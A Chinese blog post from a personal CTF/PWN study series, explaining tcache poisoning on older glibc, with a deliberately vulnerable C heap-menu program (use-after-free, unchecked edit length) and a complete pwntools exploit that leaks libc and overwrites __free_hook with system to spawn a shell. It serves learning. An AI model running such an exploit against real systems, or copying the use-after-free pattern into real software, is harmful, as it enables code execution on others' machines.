【我的 PWN 学习手札】Tcache Poisoning

已于 2024-09-19 09:22:35 修改
阅读量844 收藏 3
点赞数 8
分类专栏: 【我的 PWN 学习手札】 文章标签: pwn ctf heap poisoning
于 2024-09-19 09:22:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mr_Fmnwon/article/details/142350041
版权

目录

前言

一、Tcachebin 的组织形式

二、Tcache Poisoning

三、测试与模板

前言

早期对于 Tcachebin 的引入,在提高分配释放效率的同时,也因毫无保护而变得尤为好攻击和利用。自 glibc-2.32 以后添加了 key 等保护机制,现在的 tcachebin 利用起来变得困难。

  • glibc2.32 开始加入 Safe linking 机制,tcache 的 next 指针加密,需要先泄露堆地址绕过。
  • 新版本增加对齐检查。

不过本篇讨论的还是早期的 tcachebin,能够简单地通过 UAF 实现任意地址 malloc。  

一、Tcachebin 的组织形式

与 fastbin 十分相似,也是单链表组成,最大为 size=0x410 (64位)的表项,每个表项最多放7个同样大小的 free chunk。

注意,和 fastbin 相比还有一个较大的不同,那就是单向链表链接时是指向下一个 chunk 的 data 区域,而 fastbin 的单向链表指针指向的是下一个 free chunk 的 chunk 头。

二、Tcache Poisoning

Tcache 的组织形式非常简洁,如果我们利用 UAF 将某一块 free chunk 的 next 指针覆写为地址 target,那我们就可以将以 target 为数据区域开始的 fake chunk malloc 出来,从而进行读写操作。

因为是修改了 next 指针域,所以也被称为“毒化”,这就是 poisoning 这个名字的由来,非常直观。

三、测试与模板

 

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>

char *chunk_list[0x100];

void menu() {
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}

int get_num() {
    char buf[0x10];
    read(0, buf, sizeof(buf));
    return atoi(buf);
}

void add_chunk() {
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}

void delete_chunk() {
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}

void edit_chunk() {
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}

void show_chunk() {
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    while (1) {
        menu();
        switch (get_num()) {
            case 1:
                add_chunk();
                break;
            case 2:
                delete_chunk();
                break;
            case 3:
                edit_chunk();
                break;
            case 4:
                show_chunk();
                break;
            case 5:
                exit(0);
            default:
                puts("invalid choice.");
        }
    }
}

from pwn import *
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

# leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x7b20ea7afca0+0x7b20ea400000
libc.address=libc_base
success(hex(libc_base))

# tcache poisoning
add(0,0x70)
delete(0)
edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x70)
add(1,0x70)
edit(1,0x8,p64(libc.sym['system']))
add(1,0x10)
edit(1,0x8,b'/bin/sh\x00')
delete(1)

io.interactive()
IDEA快速创建一个WebAPI
qq_38273186的博客
09-28 4094
IDEA快速创建一个WebAPI第一步新建项目选择JDK和框架设置项目属性选择项目模版这是新建好的项目建一个controller包建一个Controller文件启动程序大功告成 第一步新建项目 选择JDK和框架 设置项目属性 选择项目模版 选择Spring Web,Spring Boot选择2.3.4是目前最新稳定版,可根据个人需要选择 # 选择目录 这是新建好的项目 建一个controller包 建一个Controller文件 启动程序 大功告成 ...
关于IDEA配置Swagger自动生成API
热门推荐
qq_40644236的博客
03-17 1万+
这年头很流行前后端分离的方式来开发项目,然后我也找了一些有关的资料学习了一下。 前两天学习了一下Swagger自动生成API的方法。然后就有一些自己的总结,感兴趣的可以看看。 我们要了解swagger,我们就要先从前后端分离去入手。按照现在的发展趋势,可以说前后端分离已经是业内对开发和部署方式所达成的一种共识。但是还有很多公司还是采用传统的开发风格,也就是以后端的MVC为主,前端人员只要提供一...
Intellij Idea下搭建基于Spring+SpringMvc+MyBatis的WebApi接口架构
weixin_30917213的博客
03-06 288
2018-08-16 09:27 更新 强烈推荐使用Springboot来搭建MVC框架! 强烈推荐使用Springboot来搭建MVC框架! 强烈推荐使用Springboot来搭建MVC框架! 后文仅供学习参考,但是新项目强烈推荐使用Springboot来搭建MVC框架! 2018-03-06 22:42 开发工具:Intellij Idea 2017.3.4(后文统一称为id...
IDEA开发一个web应用
FairyKunKun的博客
04-27 999
需求:idea+maven创建一个web应用,并且最终将web应用发布到tomcat服务器中。 补充:在idea一个窗口中创建多个应用 在web工程下,创建模块 测试模块 一个module就是一个应用,只是应用可以是java应用,也可以是web应用,接下来要创建一个module,代表一个web应用。 准备一个资源文件
Spring小知识(4):手把手教你从0开始配置ideaswagger,全步骤配图文版。
jialuosi的博客
09-15 1万+
Swagger 是一组用于设计、构建、文档化和使用 RESTful Web 服务的开源工具和框架。它允许开发团队设计、构建和测试 API,并提供易于理解的文档,以便开发人员和消费者能够快速了解和使用 API。Swagger 通常与各种编程语言和框架一起使用,以简化 API 的开发和维护过程。
【mall-learning】02-mall整合Swagger-UI实现在线API文档
to_real的博客
09-16 332
项目使用框架介绍 Swagger-UI Swagger-UI是HTML, Javascript, CSS的一个集合,可以动态地根据注解生成在线API文档。 常用注解 @Api:用于修饰Controller类,生成Controller相关文档信息 @ApiOperation:用于修饰Controller类中的方法,生成接口方法相关文档信息 @ApiParam:用于修饰接口中的参数,生成接口参数相关文档信息 @ApiModelProperty:用于修饰实体类的属性,当实体类是请求参数或返回结果
JAVA IDEA导入Swagger
qq_38273186的博客
09-29 2565
提示:文章完后,目录可以自动生成,如何生成可参考右边的帮助文档 JAVA IDEA导入Swagger一、Swagger是什么?二、使用步骤1.引入库2.新建类SwaggerConfig3.新建控制器HomeController4.新建实体类TestVo项目结构运行调试 一、Swagger是什么? Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。 总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法、参数和模型紧密集成到服务器端
使用IntelliJ IDEA建立springboot项目并添加Swagger-仅供参考(超详细)
wahahage的博客
05-25 2575
学习使用Swagger-仅供参考在pom.xml中添加依赖 在pom.xml中添加依赖 1.可选择这个(官方依赖) <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger2</artifactId> <version>2.7.0</version> </dependency>
IDEA基于SpringBoot搭建Spring+SpringMVC+MyBatis Plus Maven项目,结合Swagger 2开发REST API
Champ.Ping的博客
05-05 2708
IDEA基于SpringBoot搭建Spring+SpringMVC+MyBatis Maven项目,结合Swagger 2开发REST API 看了好几篇博客没有找到想要的资料,把自己的经验总结下来,希望对大家有帮助。 1. 创建数据库建表 CREATE TABLE `user` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` va...
JAVA开发第一个Springboot WebApi项目
技术分享博客,工作经验,技能学习分享(多做一些不会的,会有意向不到的收获,IT高手不可能永远只做会的)
03-06 1942
JAVA开发第一个Springboot WebApi项目
详解使用IntelliJ IDEA新建Java Web后端resfulAPI模板
08-27
主要介绍了详解使用IntelliJ IDEA新建Java Web后端resfulAPI模板,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
创建一个web-api工程
『程序员·小李』的博客
04-03 1187
  HTTP不仅仅是用来支持网页通信的。HTTP可以用来创建api,暴露一些数据和接口,以供调用。HTTP具有平台无关性,可以为很多客户端提供服务,包括浏览器,移动端,传统的桌面应用程序。   在此例中,你将获取到如图所示的由web-api提供的产品列表。 具体步骤如下: 1.打开visiual studio,开始--新建--新建工程。 2.选择已安装的模板,在Visual C#下...
idea swagger用法
mawei7510的博客
11-04 1385
https://www.cnblogs.com/datacenter/p/12895838.html
idea整合swagger使用
weixin_44954059的博客
07-20 1107
idea整合swagger使用 1.配置 引入依赖 <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger2</artifactId> <scope>provided </scope> </dependency> &
jeesite如何配置swagger_只会用 Postman?来了解一下 Swagger
weixin_39988331的博客
11-30 475
作者 | Yrioncnblogs.com/wyq178/p/10291447.html前言作为一个以前后端分离为模式开发小组,我们每隔一段时间都进行这样一个场景:前端人员和后端开发在一起热烈的讨论"哎,你这参数又变了啊","接口怎么又请求不通了啊","你再试试,我打个断点调试一下.."。可以看到在前后端沟通中出现了不少问题。对于这样的问题,之前一直没有很好的解决方案,直到它的出现,没错...这就...
利用idea在项目中配置swagger
huicooling的博客
07-06 3116
第一步:在pom.xml文件中配置依赖 <!-- Swagger --> <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger2</artifactId> <version>2.6.1</version&...
idea搭建一个swagger-demo
紫蝶侠的博客
01-02 1209
新建idea项目 项目结构 第一步,pom.xml文件中引入如下swagger2的依赖 <!--maven导入Swagger,begin--> <dependency> <groupId>io.springfox</groupId> <artifac...
Intellj IDEA 创建web工程
nyotengu的博客
07-20 797
一、自动生成web.xml ​ 1.选择企业级开发(Java Enterprise),自定义版本(Java EE version),勾选依赖的jar包和框架(Additional Libraries and Framework)为网络应用(Web Application),并创建配置文件(Create web.xml)版本为4.0。 二、自动生成Servlet模板 ​ 1.选中src目录...
简单易懂的Swagger入门----idea
夏呆毛的博客
08-27 3227
超级简单入手的swagger教程 准备环境: jdk----1.8 maven-----3.5 idea------2018 本次入门教程使用的是springboot结合maven,对swagger的简单入门教程,包括简单接口的编、测试等;非常适合初学者。 一、创建springboot工程 1、创建工程 下面名称自己定义即可。 下面这里选择web-springWeb,有的版本就叫web 最后一步,直接finish即可。 2、配置maven环境 具体配置方法可以看一下我的上一篇:idea构建MaB
java idea swagger配置使用
最新发布
01-14
### 如何在 IntelliJ IDEA 中配置和使用 Swagger #### 添加 Maven 依赖 为了使 Swagger 能够工作,在 `pom.xml` 文件中需加入特定的依赖项。这可以通过编辑项目的构建文件来完成: ```xml <dependencies> <!-- swagger2 --> <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger2</artifactId> <version>2.8.0</version> </dependency> <!-- swagger ui --> <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger-ui</artifactId> <version>2.8.0</version> </dependency> </dependencies> ``` 这些依赖会引入必要的库用于生成 API 文档以及提供交互式的 UI 页面[^4]。 #### 创建 Swagger 配置类 接着创建一个新的 Java 类用来初始化并配置 Swagger 实例。通常命名为类似于 `SwaggerConfig.java` 的名称,并放置于合适的位置,比如 `config` 包内: ```java import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import springfox.documentation.builders.ApiInfoBuilder; import springfox.documentation.service.ApiInfo; import springfox.documentation.spi.DocumentationType; import springfox.documentation.spring.web.plugins.Docket; @Configuration public class SwaggerConfig { @Bean public Docket api() { return new Docket(DocumentationType.SWAGGER_2) .apiInfo(apiInfo()) .select() .build(); } private ApiInfo apiInfo(){ return new ApiInfoBuilder().title("API文档").description("").termsOfServiceUrl("") .contact(new Contact("", "", "")) .license("").licenseUrl("").version("1.0") .build(); } } ``` 这段代码定义了一个 Spring Bean 来设置 Swagger 的基本信息和其他选项。 #### 启动应用测试 当上述步骤完成后,启动应用程序即可访问默认路径 `/swagger-ui.html` 查看自动生成的 RESTful 接口文档界面。通过浏览器打开该链接可以浏览到所有已暴露出来的 HTTP 请求方法及其参数说明等信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值